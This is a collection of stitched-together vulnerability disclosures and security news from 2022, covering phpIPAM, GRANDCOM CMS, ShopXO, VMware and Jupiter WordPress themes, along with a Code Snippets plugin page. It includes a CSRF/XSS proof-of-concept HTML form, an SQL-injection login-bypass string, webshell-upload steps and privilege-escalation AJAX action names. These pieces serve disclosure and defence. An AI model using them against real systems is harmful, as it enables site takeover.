PHPIPAM version 1.4.4 suffers from cross site request forgery and cross site scripting vulnerabilities.

=====[ Tempest Security Intelligence - ADV-03/2022  
]==========================

PHPIPAM - Version 1.4.4

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents ]==================================================

* Overview  
* Detailed description  
* Timeline of disclosure  
* Thanks & Acknowledgements  
* References

=====[ Vulnerability Information  
]=============================================

* Class: Improper Neutralization of Input During Web Page Generation  
('Cross-Site Scripting') [CWE-79]  
* CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

* Class: Cross-Site Request Forgery (CSRF) [CWE-352]  
* CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

=====[ Overview ]========================================================

 * System affected: PHPIPAM - Version 1.4.4  
 * Software Version: Version 1.4.4 (other versions may also be affected).  
 * Impact: PHPIPAM 1.4.4 is vulnerable to Cross-Site Request Forgery (CSRF)  
and Cross-Site Scripting (XSS) via  
app/admin/subnets/find_free_section_subnets.php. An attacker can exploit  
this by injecting javascript code to coerce an admin user into performing  
unintended actions.

=====[ Detailed description  
]=================================================

The html codes below exploit vulnerabilities in the same way due to the  
fact that both forms do not contain CSRF tokens and are vulnerable to XSS  
attacks. Then an attacker can host the forms on their malicious host and  
trick an administrator into visiting your page. If successful, the  
javascript code will execute.

* [app/admin/subnets/find_free_section_subnets.php]

<html>  
  <body>  
    <h1> Exploit PHPIPAM </h1>  
  <script>history.pushState('', '', '/')</script>  
    <form action="  
http://127.0.0.1:8082/app/admin/subnets/find_free_section_subnets.php"  
method="POST">  
      <input type="hidden" name="container" value="body" />  
      <input type="hidden" name="placement" value="top" />  
      <input type="hidden" name="sectionid" value="2'><input  
onpointerleave="alert(1)">rodnt</input><script>alert('incogbyte')</script>"  
/>  
      <input type="hidden" name="original-title" value="Search for free  
subnets in section " />  
      <input type="submit" value="Exploit" />  
    </form>  
  </body>  
</html>

=====[ Timeline of disclosure  
]===============================================

13/Jan/2022 - Responsible disclosure was initiated with the vendor;

14/Jan/2022 - PHPIPAM confirmed the issues;

17/Jan/2022 - The vendor fixed the issues XSS and CSRF;

24/Mar/2022 - CVE reserved as CVE-2021-46426;

25/Mar/2022 - CVE assigned [5].

=====[ Thanks & Acknowledgements ]========================================

* Tempest Security Intelligence [4]

=====[ References ]=====================================================

[1] [  
https://cwe.mitre.org/data/definitions/352.html|https://cwe.mitre.org/data/definitions/352.html  
]

[2] [  
https://cwe.mitre.org/data/definitions/79.html|https://cwe.mitre.org/data/definitions/79.html  
]

[3] [  
https://github.com/phpipam/phpipam/commit/6c1f72816d6ac634e9c174057e008717d959f351|https://github.com/phpipam/phpipam/commit/6c1f72816d6ac634e9c174057e008717d959f351  
]

[4] [https://www.tempest.com.br|https://www.tempest.com.br/]

[5] [  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46426|https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46426  
]

[6][ Thanks to Celso (CGB) =)]

=====[ EOF ]===========================================================

--

PHPIPAM 1.4.4 Cross Site Request Forgery / Cross Site Scripting

GRANDCOM DynWEB before 4.2 contains a SQL Injection vulnerability in the admin login interface. A remote unauthenticated attacker can exploit this vulnerability to obtain administrative access to the webpage, access the user database, modify web content and upload custom files. The backend login script does not verify and sanitize user-provided strings.

**Authentication Bypass in GRANDCOM CMS**

*   Vendor Homepage: https://www.grandcom.sk/
*   Affected Version: 4.2 and older

SQL injection vulnerability in GRANDCOM CMS allows remote unauthenticated attackers to bypass authentication via a crafted username during a login attempt. Any unauthorized user with access to the application is able to exploit this vulnerability.

> SQL Injection attack consists of inserting an SQL query through the input data from the client into the application. Upon successful misuse, it is possible to retrieve detailed data from the database, edit database data such as inserting, updating or deleting data, work with administrative operations in the database, or in some situations run commands directly on the operating system.

**Steps to reproduce**

1.  Visit the following resource /admin/index.php.
2.  Enter the below mentioned credentials in the vulnerable field:

*   username: admin' -- -
*   password: _anything_

5.  Press the **Login** button, this will result in a successful Authentication Bypass.

**Remediation**

*   Use of Prepared Statements (with Parameterized Queries)
*   Use of Stored Procedures
*   Allow-list Input Validation
*   Escaping All User Supplied Input

Discovered by Martin Kubecka, July 19, 2021.

CVE-2021-37413: CVE-References/CVE-2021-37413.md at main · martinkubecka/CVE-References

CISA orders US federal agencies to implement patches ASAP

John Leyden 19 May 2022 at 15:14 UTC

CISA orders US federal agencies to implement patches ASAP

US Federal agencies have been instructed to either immediately patch or temporarily deactivate a set of enterprise products from VMware in response to “active and expected exploitation of multiple vulnerabilities”.

An emergency directive from the US Cybersecurity and Infrastructure Security Agency (CISA) urges patching of VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.

If prompt patching is impractical then federal agencies are instructed to remove instances of vulnerable products from agency networks.

**Act fast**

Attackers have reverse engineered recently disclosed software vulnerabilities in the various VMware products in order to develop exploits and attack unpatched systems.

The tactic has already resulted in active exploitation of CVE-2022-22954 and CVE-2022-22960, with more abuse along the same lines likely to follow.

YOU MIGHT ALSO LIKE Popular websites leaking user email data to web tracking domains

“Based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit CVE-2022-22972 and CVE-2022-22973, which were disclosed by VMware on May 18, 2022,” an alert from the agency warns.

In a related advisory issued by VMware on Wednesday (May 18), the vendor explained that it had patched an authentication bypass vulnerability (CVE-2022-22972) and a local privilege escalation vulnerability (CVE-2022-22973) involving VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.

The CVE-2022-22954 vulnerability already under active attack involves a server-side template injection vulnerability in VMware Workspace ONE Access and Identity Manager that poses a remote code execution risk. The flaw earned a CVSS score of 9.8, close to the maximum possible.

Catch up on the latest cyber-attack news

The CVE-2022-22960 flaw involves a lesser but still high-risk privilege escalation vulnerability involving VMware Workspace ONE Access, Identity Manager, and vRealize Automation.

Both flaws have come under active attack, just days after the release of patches, security vendor Barracuda Networks reports:

The vast majority of the attacks came in from the US geographically, with most of them coming in from data centers and cloud providers. While the spikes are largely from these IP ranges, there are also consistent background attempts from known bad IPs in Russia. Some of these IPs perform scans for specific vulnerabilities at regular intervals, and it looks like the VMware vulnerabilities have been added to their usual rotating list of Laravel/Drupal/PHP probes.

The motive behind the attacks remains unclear.

Although the unusual emergency action advisory is primarily directed at US federal agencies, CISA is urging other enterprise organizations to either update or remove installations of the affected products from their networks.

Vulnerable, internet-accessible installations of affected products should be treated as already potentially compromised, CISA adds.

RECOMMENDED Rogue cloud users could sabotage fellow off-prem tenants via critical Flux flaw

Active attacks against VMware flaws prompts emergency update directive

An issue was discovered in ShopXO CMS 2.2.0. After entering the management page, there is an arbitrary file upload vulnerability in three locations.

Affects version shopxo 2.2.0  
After entering the management page as admininstrator there is an arbitrary file upload vulnerability in 3 locations , you can upload webshell into the site.

**The first location:**

网站管理->主题管理->主题安装  
the post url is /admin.php?s=theme/upload.html  
the step is:

1.  download the default theme from offical(https://shopxo.store/goods-80.html)
2.  unzip the zip
3.  Only delete files with "php" suffix due to file security check, new a evil file named phpinfo.pHp or phpinfo.phtml in the "css" folder and the root folder  
      
    
4.  Recompress the file as a new zip file
5.  upload it  
    you will find the evil file is in public/static/index/<your renamed folder name>/css/phpinfo.pHp and app/index/view/<your renamed folder name>/phpinfo.pHp  
    

**The second location:**

应用中心->应用管理->上传应用  
the post url is /admin.php?s=pluginsadmin/upload.html  
like the first location

1.  download a casual plugin from offical(https://shopxo.store/goods-75.html) like this
2.  unzip the zip
3.  new a evil file named phpinfo.php in the _controller_-><pluginname>->admin folder
4.  Recompress the file as a new zip file
5.  upload it

you will find the evil file is in app/plugins/freightfee/admin/phpinfo.php

**The third location:**

手机管理->小程序列表->主题安装  
the post url is /admin.php?s=appmini/themeupload.html

the step is

1.  new a evil file phpinfo.php and compress the file as a new zip file
2.  upload it

you will find the evil file in sourcecode/weixin/phpinfo.php

CVE-2021-41938: After entering the management page，there is an arbitrary file upload vulnerability in 3 locations · Issue #64 · gongfuxiang/shopxo

Privilege escalation flaw discovered in the Jupiter and JupiterX Core Plugin affects more than 90,000 sites.

Privilege escalation flaw discovered in the Jupiter and JupiterX Core Plugin affects more than 90,000 sites.

A critical privilege escalation flaw found in two themes used by more than 90,000 WordPress sites can allow threat actors to take over the sites completely, researchers have found.

WordFence Threat Intelligence Team researcher Ramuel Gall discovered the flaw, one of five vulnerabilities he found between early April and early May in the Jupiter and JupiterX Premium WordPress themes, he revealed in a blog post published Wednesday.

One of the flaws—tracked as CVE-2022-1654 and rated as 9.9, or critical on the CVSS–allows for “any authenticated attacker, including a subscriber or customer-level attacker, to gain administrative privileges and completely take over any site running either the Jupiter Theme or JupiterX Core Plugin,” he wrote. The plugin is required to run the JupiterX theme.  

Affected versions of the themes are: Jupiter Theme 6.10.1 or earlier, and JupiterX Core Plugin 2.0.7 or earlier.

WordFence finished their investigation of most of flaws on April 5 and reported them to the Jupiter and JupiterX theme developer ArtBees on the same day; on May 3 they notified the developer of an additional Jupiter theme flaw. By May 10, the developed had released updated versions of both the Jupiter and JupiterX themes that had patched all the flaws.

****Critical Vulnerability****

The critical flaw found resides in a function, uninstallTemplate, which is intended to reset a site after a template is uninstalled. However, it “has the additional effect of elevating the user calling the function to an administrator role,” Gall wrote. In the Jupiter theme, the function is found in the theme itself; in JupiterX, it’s present in the JupiterX Core plugin.

“Vulnerable versions register AJAX actions but do not perform any capability checks or nonce checks,” he wrote.

On a site with a vulnerable version of the Jupiter Theme installed, any logged-in user can elevate their privileges to those of an administrator by sending an AJAX request with the action parameter set to abb\_uninstall\_template. This calls the uninstallTemplate function, which calls the resetWordpressDatabase function, which effectively reinstalls the site with the currently logged-in user as the new site owner, Gall explained.

On a site where a vulnerable version of the JupiterX Core plugin is installed, someone can access the same functionality by sending an AJAX request with the action parameter set to jupiterx\_core\_cp\_uninstall\_template, he said.

****Other Vulnerabilities****

WordPress plugins, often developed by third-party developers, are notoriously buggy. Previous flaws found in plugins for the popular website-creation and -hosting platform also have allowed for site takeover, as well as enabled WordPress subscribers to totally wipe sites not belonging to them, or attackers to forge emails to subscribers.

Of the other flaws that Gall discovered, three—tracked as CVE-2022-1656, CVE-2022-1658 and CVE-2022-1659–are rated as medium risk and one, CVE-2022-1657 is rated as high risk.

The high-risk flaw, which affects JupiterX Theme 2.0.6 or earlier and Jupiter Theme 6.10.1 or earlier, can allow an attacker to obtain privileged information, such as nonce values, or perform restricted actions, Gall explained. This can be done by including and executing files from any location on the site.

“Vulnerable versions of the Jupiter and JupiterX Themes allow logged-in users, including subscriber-level users, to perform Path Traversal and Local File inclusion,” Gall explained.

In the JupiterX theme, this can be done by using the jupiterx\_cp\_load\_pane\_action AJAX action present in the lib/admin/control-panel/control-panel.php file to call the load\_control\_panel\_pane function. “It is possible to use this action to include any local PHP file via the slug parameter,” Gall wrote.

The Jupiter theme has a nearly identical vulnerability, which an attacker can exploit via the mka\_cp\_load\_pane\_action AJAX action present in the framework/admin/control-panel/logic/functions.php file, which calls the mka\_cp\_load\_pane\_action function, he said.

Wordfence researchers recommend that anyone using the affected themes updated to the patched versions immediately. The company released a firewall rule to protect Wordfence Premium, Wordfence Care and Wordfence Response customers on April 5, and free Wordfence users on May 4.

Critical Vulnerability in Premium WordPress Themes Allows for Site Takeover

Reflected Cross-Site Scripting (XSS) vulnerability in Code Snippets plugin <= 2.14.3 at WordPress via &orderby vulnerable parameter.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Code Snippets is an easy, clean and simple way to run code snippets on your site. It removes the need to add custom snippets to your theme’s functions.php file.

A snippet is a small chunk of PHP code that you can use to extend the functionality of a WordPress-powered website; essentially a mini-plugin with less load on your site.  
Most snippet-hosting sites tell you to add snippet code to your active theme’s functions.php file, which can get rather long and messy after a while.  
Code Snippets changes that by providing a GUI interface for adding snippets and **actually running them on your site** just as if they were in your theme’s functions.php file.

Code Snippets provides graphical interface, similar to the Plugins menu, for managing snippets. Snippets can be activated and deactivated, just like plugins. The snippet editor includes fields for a name, a visual editor-enabled description, tags to allow you to categorize snippets, and a full-featured code editor. Snippets can be exported for transfer to another site, either in JSON for later importing by the Code Snippets plugin, or in PHP for creating your own plugin or theme.

If you have any feedback, issues, or suggestions for improvements please leave a topic in the Support Forum, or join the community on Facebook.

If you like this plugin, or it is useful to you in some way, please consider reviewing it on WordPress.org.

If you’d like to contribute to the plugin’s code or translate it into another language, you can fork the plugin on GitHub.

**Translations**

Code Snippets can be used in these different languages thanks to the following translators:

*   Belarusian – Hrank.com
*   Brazilian Portuguese – Bruno Borges
*   Chinese – Jincheng Shan and 诗语
*   Chinese (Taiwan) – Alex Lion and Chun-Chih Cheng
*   Croatian – Borisa Djuraskovic from Web Hosting Hub
*   Czech – Lukáš Tesař and Jakub Humpolec
*   Danish – Finn Sommer Jensen
*   Dutch – Sander Spies, Peter Smits and mother.of.code.a11n
*   English (New Zealand) and English (UK) – webaware
*   English (South Africa) – webaware and Ian Barnes
*   French – momo-fr, Didier Demory, Cyrille Sanson and Shea Bunge
*   French (Canada) – Dominic Desbiens
*   German – Mario Siegmann, Joerg Knoerchen, David Decker and Andreas
*   Greek – Konstantinos Megas and Toni Bishop from Jrop
*   Indonesian – Jordan Silaen from ChameleonJohn.com
*   Italian – Usman Wagan, Luisa Ravelli and ElectricFeet
*   Japanese – mt8, Takakazu Nagaya, Naoko Takano and melvas
*   Persian – Mohammad Novintanon
*   Russian – Alexander Samsonov, Yui, Denis Yanchevskiy and krioteh
*   Slovak – Ján Fajčák
*   Spanish (Colombia) and Spanish (Ecuador) – Javier Esteban
*   Spanish (Spain) – Ibidem Group, Javier Esteban, Fernando Tellado and Juanma Aranda
*   Spanish (Venezuela) – Yordan Soares
*   Swedish – Argentum, Fredrik and Tor-Bjorn Fjellner
*   Urdu – Samuel Badree
*   Vietnamese – Tuan Phan

**Automatic installation**

1.  Log into your WordPress admin
2.  Click **Plugins**
3.  Click **Add New**
4.  Search for **Code Snippets**
5.  Click **Install Now** under “Code Snippets”
6.  Activate the plugin

**Manual installation**

1.  Download the plugin
2.  Extract the contents of the zip file
3.  Upload the contents of the zip file to the wp-content/plugins/ folder of your WordPress installation
4.  Activate the Code Snippets plugin from ‘Plugins’ page.

Network Activating Code Snippets through the Network Dashboard will enable a special interface for running snippets across the entire network.

A full list of our Frequently Asked Questions can be found at help.codesnippets.pro.

**How can I recover my site if it is crashed by a buggy snippet?**

You can recover your site by enabling the Code Snippets safe mode feature. Instructions for how to turn it on are available here: https://help.codesnippets.pro/article/12-safe-mode.

**Will I lose my snippets if I change the theme or upgrade WordPress?**

No, the snippets are stored in the WordPress database, independent of the theme and unaffected by WordPress upgrades.

**Can the plugin be completely uninstalled?**

If you enable the ‘Complete Uninstall’ option on the plugin settings page, Code Snippets will clean up all of its data when deleted through the WordPress ‘Plugins’ menu. This includes all stored snippets. If you would like to preserve the snippets, ensure they are exported first.

**Can I copy snippets that I have created to another WordPress site?**

Yes! You can individually export a single snippet using the link below the snippet name on the ‘Manage Snippets’ page or bulk export multiple snippets using the ‘Bulk Actions’ feature. Snippets can later be imported using the ‘Import Snippets’ page by uploading the export file.

**Can I export my snippets to PHP for a site where I’m not using the Code Snippets plugin?**

Yes. Click the checkboxes next to the snippets you want to export, and then choose **Export to PHP** from the Bulk Actions menu and click Apply. The generated PHP file will contain the exported snippets’ code, as well as their name and description in comments.

**Can I run network-wide snippets on a multisite installation?**

You can run snippets across an entire multisite network by **Network Activating** Code Snippets through the Network Dashboard. You can also activate Code Snippets just on the main site, and then individually on other sites of your choice.

**Where are the snippets stored in my WordPress database?**

Snippets are stored in the wp_snippets table in the WordPress database. The table name may differ depending on what your table prefix is set to.

**Where can I go for help or suggest new features?**

You can get help with Code Snippets, report bugs or errors, and suggest new features and improvements either on the WordPress Support Forums or on GitHub

**How can I help contribute to the development of the Code Snippets plugin?**

The best way to do this is to fork the repository on GitHub and send a pull request.

Works perfectly, and safely

Un plugin sencillo, efectivo y limpio. Gracias.

Hi, Firstly it works very well as it is expected. The only thing I did’nt find is how register a new label. As I write a new label it is not registered Thanks a lot for the job

I've been using this plugin for years and I really like its features. Yes, you can disable your site very easily by injecting PHP code, but that is not the fault of the plugin; with great power comes great responsibility.

Read all 366 reviews

“Code Snippets” is open source software. The following people have contributed to this plugin.

Contributors

**3.1.0 (17 May 2022)**

*   Fixed: Caching inconsistencies preventing snippets and settings from refreshing on sites with persistent object caching.
*   Improved: Simplified database queries.
*   Added: More comprehensive cache coverage, including for active snippets.
*   Added: Icon to ‘Go Pro’ button indicating it opens an external tab.
*   Improved: Allow display styles in snippet descriptions.

**3.0.1 (14 May 2022)**

*   Fixed: Incompatibility issue with earlier versions of PHP.

**3.0.0 (14 May 2022)**

**Added**

*   Added: HTML content snippets for displaying as shortcodes or including in the page head or footer area.
*   Added: Notice reminding users to upgrade unsupported PHP versions.
*   Added: Visual settings to add attributes to shortcodes.
*   Added: Shortcode buttons to the post and page content editors.
*   Added: Basic REST API endpoints.
*   Added: Snippet type column to the snippets table.
*   Added: Snippet type badges to Edit and Add New Snippet pages.
*   Added: Setting to control whether the current line of the code editor is highlighted.
*   Added: Display a warning when saving a snippet with missing title or code.
*   Added: Add suffix to title of cloned snippets.

**Changed**

*   Improved: Updated plugin code to use namespaces, preventing name collisions with other plugins.
*   Improved: Added key for the ‘active’ and ‘scope’ database table columns to speed up queries.
*   Improved: Redirect from edit menu if not editing a valid snippet.
*   Improved: Moved activation switch into its own table column.
*   Improved: Updated code documentation according to WordPress standards.
*   Improved: Added snippet type labels to the tabs on the Snippets page.
*   Improved: Split settings page into tabs.
*   Improved: Use the version of CodeMirror included with WordPress where possible to inherit the additional built-in features.
*   Improved: Added hover effect to priority settings in the snippets table to show that they are editable.
*   Fixed: Snippets table layout on smaller screens.

**Deprecated**

*   Removed: Deprecated functions and compatibility code for unsupported PHP versions.
*   Removed: Option to disable snippet scopes.

**New in Pro**

*   Added: CSS style snippets for the site front-end and admin area.
*   Added: JavaScript snippets for the site head and body area on the front-end.
*   Added: Browser cache versioning for CSS and JavaScript snippets.
*   Added: Support for exporting and downloading CSS and JavaScript snippets.
*   Added: Support for highlighting code on the front-end.
*   Added: Editor syntax highlighting for CSS, JavaScript and HTML snippets.
*   Added: Button to preview full file when editing CSS or JavaScript snippets.
*   Added: Option to minify CSS and JavaScript snippets.
*   Added: Gutenberg editor block for displaying content snippets.
*   Added: Gutenberg editor block for displaying snippet source code.
*   Added: Elementor widget for displaying content snippets.
*   Added: Elementor widget for displaying snippet source code.

**2.14.6 (13 May 2022)**

*   Fixed: Issue with processing uploaded import files.
*   Fixed: Issue with processing tag filters.

**2.14.5 (10 May 2022)**

*   Fixed: Incompatibility issue with older versions of PHP.

**2.14.4 (5 May 2022)**

*   Fixed: Prevent array key errors when loading the snippet table with unknown order values.

**2.14.3 (10 Dec 2021)**

*   Fixed: Potential security issue outputting snippets-safe-mode query variable value as-is. Thanks to Krzysztof Zając for reporting.

**2.14.2 (9 Sep 2021)**

*   Fixed: Prevent network snippets table from being created on single-site installs.
*   Added translations:
    *   Spanish by Ibidem Group
    *   Urdu by Samuel Badree
    *   Greek by Toni Bishop from Jrop
*   Added: Support for :class syntax to the code validator.
*   Added: PHP8 support to the code linter.
*   Added: Color picker feature to the code editor.
*   Added: Failsafe to prevent multiple versions of Code Snippets from running simultaneously.

**2.14.1 (10 Mar 2021)**

*   Added: Czech translation by Lukáš Tesař.
*   Fixed: Code validator now supports function_exists and class_exists checks.
*   Fixed: Code validator now supports anonymous functions.
*   Fixed: Issue with saving the hidden columns setting.
*   Fixed: Replaced the outdated tag-it library with tagger for powering the snippet tags editor.
*   Added: Code direction setting for RTL users.
*   Updated CodeMirror to version 5.59.4.
*   Added: Additional action hooks and search API thanks to @Spreeuw.

**2.14.0 (26 Jan 2020)**

*   Updated CodeMirror to version 5.50.2.
*   Added: Basic error checking for duplicate functions and classes.
*   Updated Italian translations to fix display issues – thanks to Francesco Marino.
*   Fixed: Ordering snippets in the table by name will now be case-insensitive.
*   Added: Additional API options for retrieving snippets.
*   Fixed: Code editor will now properly highlight embedded HTML, CSS and JavaScript code.
*   Changed the indicator color for inactive snippets from red to grey.
*   Fixed a bug preventing the editor theme from being set to default.
*   Added: Store the time and date when each snippet was last modified.
*   Added: Basic error checking when activating snippets.
*   Fixed: Ensure that imported snippets are always inactive.
*   Fixed: Check the referer on the import menu to prevent CSRF attacks. Thanks to Chloe with the Wordfence Threat Intelligence team for reporting.
*   Fixed: Ensure that individual snippet action links use proper verification.

**2.13.3 (13 Mar 2019)**

*   Added: Hover effect to activation switches.
*   Added: Additional save buttons above snippet editor.
*   Added: List save keyboard shortcuts to the help tooltip.
*   Added: Change “no items found” message when search filters match nothing.
*   Fixed: Calling deprecated code in database upgrade process.
*   Fixed: Include snippet priority in export files.
*   Fixed: Use Unix newlines in code export file.
*   Updated CodeMirror to version 5.44.0.
*   Fixed: Correctly register snippet tables with WordPress to prevent database repair errors \[#\]
*   Fixed: CodeMirror indentation settings being applied incorrectly

**2.13.2 (25 Jan 2019)**

*   Removed potentially problematic cursor position saving feature

**2.13.1 (22 Jan 2019)**

*   Added: Add menu buttons to settings page for compact menu
*   Updated: French translation updated thanks to momo-fr
*   Fixed: Split code editor and tag editor scripts into their own files to prevent dependency errors
*   Fixed: Handling of single-use shared network snippets
*   Fixed: Minor translation template issues
*   Added: Help tooltop to snippet editor for keyboard shortcuts, thanks to Michael DeWitt
*   Improved: Added button for executing single-use snippets to snippets table
*   Added: Sample snippet for ordering snippets table by name by default
*   Updated CodeMirror to version 5.43.0

**2.13.0 (17 Dec 2018)**

*   Added: Search/replace functionality to the snippet editor. See here for a list of keyboard shortcuts. \[#\]
*   Updated CodeMirror to version 5.42.0
*   Added: Option to make admin menu more compact
*   Fixed: Problem clearing recently active snippet list
*   Improved: Integration between plugin and the CodeMirror library, to prevent collisions
*   Improved: Added additional styles to editor settings preview
*   Added: PHP linter to code editor
*   Improved: Use external scripts instead of inline scripts
*   Fixed: Missing functionality for ‘Auto Close Brackets’ and ‘Highlight Selection Matches’ settings

**2.12.1 (15 Nov 2018)**

*   Improved: CodeMirror updated to version 5.41.0
*   Improved: Attempt to create database columns that might be missing after a table upgrade
*   Improved: Streamlined upgrade process
*   Fixed: Interface layout on sites using right-to-left languages
*   Improved: Made search box appear at top of page on mobile \[#\]
*   Updated screenshots

**2.12.0 (23 Sep 2018)**

*   Fixed: Prevented hidden columns setting from reverting to default
*   Improved: Updated import page to improve usability
*   Improved: Added Import button next to page title on manage page
*   Improved: Added coloured banner indicating whether a snippet is active when editing
*   Update CodeMirror to 5.40.0

**2.11.0 (24 Jul 2018)**

*   Added: Ability to assign a priority to snippets, to determine the order in which they are executed
*   Improvement: The editor cursor position will be preserved when saving a snippet
*   Added: Pressing Ctrl/Cmd + S while writing a snippet will save it
*   Added: Shadow opening PHP tag above the code editor
*   Improved: Updated the message shown when there are no snippets
*   Added: Install sample snippets when the plugin is installed
*   Improved: Show all available tags when selecting the tag field
*   Added: Filter hook for controlling the default list table view
*   Added: Action for cloning snippets

**The full changelog is available on GitHub**

CVE-2022-25617: Code Snippets

Jupiter Theme versions 6.10.1 and below as well as JupiterX Core plugin versions 2.0.7 and below suffer from privilege escalation and post deletion vulnerabilities. JupiterX Theme versions 2.0.6 and below as well as JupiterX Core versions 2.0.6 and below suffer from plugin deactivation and setting modification flaws. JupiterX Theme versions 2.0.6 and below as well as Jupiter Theme versions 6.10.1 and below suffer from path traversal and local file inclusion vulnerabilities. Jupiter Theme versions 6.10.1 and below suffer from an arbitrary plugin deletion vulnerability. JupiterX Core plugin versions 2.0.6 and below suffer from information disclosure, modification, and denial of service vulnerabilities.

Description: Authenticated Privilege Escalation and Post deletion

Affected Software: Jupiter Theme and JupiterX Core Plugin

Slug(s): jupiter (theme), jupiterx-core(plugin)

Developer: ArtBees

Affected Versions: Jupiter Theme <= 6.10.1 and JupiterX Core Plugin <= 2.0.7

CVE ID: CVE-2022-1654

CVSS score: 9.9 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Researcher(s): Ramuel Gall

Fully Patched Versions: Jupiter Theme 6.10.2 and JupiterX Core Plugin 2.0.8

This vulnerability allows any authenticated attacker, including a subscriber or customer-level attacker, to gain administrative privileges and completely take over any site running either the Jupiter Theme or JupiterX Core Plugin. The JupiterX Core plugin is required for the JupiterX theme.

The classic Jupiter Theme contains a function, uninstallTemplate, which is intended to reset a site after a template is uninstalled, but has the additional effect of elevating the user calling the function to an administrator role. In JupiterX, this functionality has been migrated to the JupiterX Core plugin. Vulnerable versions register AJAX actions but do not perform any capability checks or nonce checks.

On a site with a vulnerable version of the Jupiter Theme installed, any logged-in user can elevate their privileges to those of an administrator by sending an AJAX request with the action parameter set to abb_uninstall_template.

This calls the uninstallTemplate function, which calls the resetWordpressDatabase function, where the site is effectively reinstalled with the currently logged-in user as the new site owner.

On a site where a vulnerable version of the JupiterX Core plugin is installed, the same functionality can also be accessed by sending an AJAX request with the action parameter set to jupiterx_core_cp_uninstall_template.

Description: Insufficient Access Control leading to Authenticated Arbitrary Plugin Deactivation and Settings Modification

Affected Software: JupiterX Theme and JupiterX Core Plugin

Slug(s): jupiterx (theme), jupiterx-core(plugin)

Developer: ArtBees

Affected Versions: JupiterX Theme <= 2.0.6 and JupiterX Core <= 2.0.6

CVE ID: CVE-2022-1656

CVSS score: 6.5 (Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Researcher(s): Ramuel Gall

Fully Patched Versions: JupiterX Theme 2.0.7 and JupiterX Core Plugin 2.0.7

This vulnerability allows an attacker to reduce site security or damage functionality.

Vulnerable versions of the JupiterX Theme allow any logged-in user, including subscriber-level users, to access any of the functions registered in lib/api/api/ajax.php, which also grant access to the jupiterx_api_ajax_ actions registered by the JupiterX Core Plugin. This includes the ability to deactivate arbitrary plugins as well as update the theme’s API key.

Description: Authenticated Path Traversal and Local File Inclusion

Affected Software: JupiterX Theme and Jupiter Theme

Slug(s): jupiterx (theme), jupiter(theme)

Developer: ArtBees

Affected Versions: JupiterX Theme <= 2.0.6 and Jupiter Theme <= 6.10.1

CVE ID: CVE-2022-1657

CVSS score: 8.1 (High)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Researcher(s): Ramuel Gall

Fully Patched Versions: JupiterX Theme 2.0.7 and Jupiter Theme 6.10.2

This vulnerability could allow an attacker to obtain privileged information, such as nonce values, or perform restricted actions, by including and executing files from any location on the site.

Vulnerable versions of the Jupiter and JupiterX Themes allow logged-in users, including subscriber-level users, to perform Path Traversal and Local File inclusion.

In the JupiterX theme, the jupiterx_cp_load_pane_action AJAX action present in the lib/admin/control-panel/control-panel.php file calls the load_control_panel_pane function. It is possible to use this action to include any local PHP file via the slug parameter.

The Jupiter theme has a nearly identical vulnerability which can be exploited via the mka_cp_load_pane_action AJAX action present in the framework/admin/control-panel/logic/functions.php file, which calls the mka_cp_load_pane_action function.

Description: Insufficient Access Control leading to Authenticated Arbitrary Plugin Deletion

Affected Software: Jupiter Theme

Slug(s): jupiter (theme)

Developer: ArtBees

Affected Versions: Jupiter Theme <= 6.10.1

CVE ID: CVE-2022-1658

CVSS score: 6.5 (Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Researcher(s): Ramuel Gall

Fully Patched Versions: Jupiter Theme 6.10.2

This vulnerability allows an attacker to reduce site security or damage functionality.

Vulnerable versions of the Jupiter Theme allow arbitrary plugin deletion by any authenticated user, including users with the subscriber role, via the abb_remove_plugin AJAX action registered in the framework/admin/control-panel/logic/plugin-management.php file.

Using this functionality, any logged-in user can delete any installed plugin on the site.

Description: Information Disclosure, Modification, and Denial of Service

Affected Software: JupiterX Core Plugin

Slug(s): jupiterx-core (plugin)

Developer: ArtBees

Affected Versions: JupiterX Core Plugin <= 2.0.6

CVE ID: CVE-2022-1659

CVSS score: 6.3 (Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Researcher(s): Ramuel Gall

Fully Patched Versions: JupiterX Core Plugin 2.0.7

This vulnerability allows an attacker to view site configuration and logged-in users, modify post conditions, or perform a denial of service attack.

Vulnerable versions of the JupiterX Core plugin register an AJAX action jupiterx_conditional_manager which can be used to call any function in the includes/condition/class-condition-manager.php file by sending the desired function to call in the sub_action parameter.

Timeline

April 5, 2022 - The Wordfence Threat Intelligence team finishes our investigation of the Jupiter and JupiterX Themes. We release a firewall rule to protect Wordfence Premium, Wordfence Care, and Wordfence Response customers. We contact the theme developer and send over the full disclosure.

April 28, 2022 - A partially patched version of the JupiterX theme and JupiterX Core plugin is released.

May 3, 2022 - We follow up with the theme developer about additional patches and notify them of an additional vulnerability we found in the Jupiter Theme.

May 4, 2022 - Firewall rule becomes available to Wordfence free users.

May 10, 2022 - Fully Patched versions of the Jupiter Theme and JupiterX Core plugin are released. We verify that all vulnerabilities are addressed.

Conclusion

In today’s article, we covered a number of vulnerabilities present in the Jupiter and JupiterX themes and the JupiterX Core companion plugin. The most severe vulnerability allows any logged-in user to easily gain administrator privileges.

Wordfence Premium, Wordfence Care, and Wordfence Response customers have been protected from these vulnerabilities since April 5, 2022, and free Wordfence users received the same protection on May 4, 2022.

We strongly recommend updating to the latest versions of the impacted themes and plugins available immediately.

Since several versions across several slugs are impacted, we’ll reiterate what you should update:

